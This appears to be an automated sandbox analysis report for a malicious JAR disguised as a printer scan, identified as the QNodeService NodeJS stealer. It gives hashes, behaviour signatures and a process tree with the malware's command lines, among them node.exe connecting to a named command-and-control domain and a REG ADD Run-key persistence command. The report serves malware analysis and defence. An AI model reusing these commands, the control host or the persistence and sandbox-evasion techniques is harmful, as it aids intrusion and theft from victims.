Analysis
- max time kernel: 119s
- max time network: 143s
- platform: windows10_x64
- resource: win10
- submitted: 27-10-2020 12:52
- Static task: static1
- Behavioral task: behavioral1 (Sample: Scanned from a Xerox Multifunction Printer.jar, Resource: win7)
- Behavioral task: behavioral2 (Sample: Scanned from a Xerox Multifunction Printer.jar, Resource: win10)
General
- Target: Scanned from a Xerox Multifunction Printer.jar
- Size: 71KB
- MD5: ef50330c3ba37193196fb2678b81c358
- SHA1: fedda1f30f37cfbcd7a30fadfb32da968923bc55
- SHA256: 51a266885dd543b93c91be648fd52e64fae3a3af8a17616e86357facb982622f
- SHA512: ea5a1a3b90f3663dea5408d49b6e453872fd6446d688ac409d9c750478c17b1b8ab2e47ea95e2f1860f9af4cf5b83fbbf806671781c09d6b2e08ef880f23b024
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.
- Executes dropped EXE (3 IoCs)
  pid / Process:
  - 1788 node.exe
  - 1360 node.exe
  - 1236 node.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description / ioc / Process:
  - Key created: \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\6d525496-aed7-45ef-84d3-bc52e5b4f80b = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" (reg.exe)
- JavaScript code in executable (3 IoCs)
  resource / yara_rule:
  - behavioral2/files/0x000100000001ab5f-174.dat (js)
  - behavioral2/files/0x000100000001ab5f-177.dat (js)
  - behavioral2/files/0x000100000001ab5f-181.dat (js)
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc:
  - 27 wtfismyip.com
  - 28 wtfismyip.com
- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description / ioc / Process:
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString (node.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (node.exe)
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 (node.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz (node.exe)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid / Process:
  - 1788 node.exe (4 entries)
  - 1360 node.exe (4 entries)
  - 1236 node.exe (10 entries)
- Suspicious use of WriteProcessMemory (12 IoCs)
  description / pid / Process / procid_target (each entry recorded twice):
  - PID 4032 wrote to memory of 3672: 4032 java.exe, target 75
  - PID 3672 wrote to memory of 1788: 3672 javaw.exe, target 79
  - PID 1788 wrote to memory of 1360: 1788 node.exe, target 81
  - PID 1360 wrote to memory of 1236: 1360 node.exe, target 82
  - PID 1236 wrote to memory of 3580: 1236 node.exe, target 84
  - PID 3580 wrote to memory of 3936: 3580 cmd.exe, target 85
Processes
- C:\ProgramData\Oracle\Java\javapath\java.exe
  Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\Scanned from a Xerox Multifunction Printer.jar"
  PID: 4032
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\1c07e8ca.tmp
    PID: 3672
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain karimrnosa2.home-webserver.de
      PID: 1788
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.js --hub-domain karimrnosa2.home-webserver.de
        PID: 1360
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_orce3J\boot.js --hub-domain karimrnosa2.home-webserver.de
          PID: 1236
          - Executes dropped EXE
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          - C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "6d525496-aed7-45ef-84d3-bc52e5b4f80b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            PID: 3580
            - Suspicious use of WriteProcessMemory
            - C:\Windows\system32\reg.exe
              Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "6d525496-aed7-45ef-84d3-bc52e5b4f80b" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              PID: 3936
              - Adds Run key to start application